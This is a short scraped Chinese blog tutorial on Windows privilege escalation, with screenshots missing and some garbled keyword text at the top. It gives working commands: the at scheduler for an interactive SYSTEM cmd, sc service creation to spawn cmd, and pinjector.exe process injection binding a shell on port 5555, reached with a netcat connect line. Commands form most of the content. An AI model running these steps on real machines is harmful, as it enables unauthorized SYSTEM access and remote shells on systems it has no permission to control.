1. 程式人生 > >windows提權

windows提權

mar 進程 ima roc ESS path 0.10 所有 star

  • PsExec
  • at
  • Process_Injector
  • sc

  • psexec

    當前用戶是jh
    技術分享圖片
    提權之後
    技術分享圖片


    *at命令提權(適用於xp,2003)

    at 15:05 /interact cmd  

    技術分享圖片


    sc

    創建服務(打開cmd命令窗口的服務)

        sc Create systemcmd binPath= "cmd /K start" type= own type= interact

    啟動服務剛才創建的服務

        sc start systemcmd

    process_injector

    列出當前的所有進程

    pinjector.exe -l

    技術分享圖片

    選擇要提權成的用戶,進行進程註入

    pinjector.exe -p 732 cmd 5555   #服務端實現進程註入
    nc -nv 10.10.10.19 5555    # 客戶端連接服務端

    技術分享圖片

    windows提權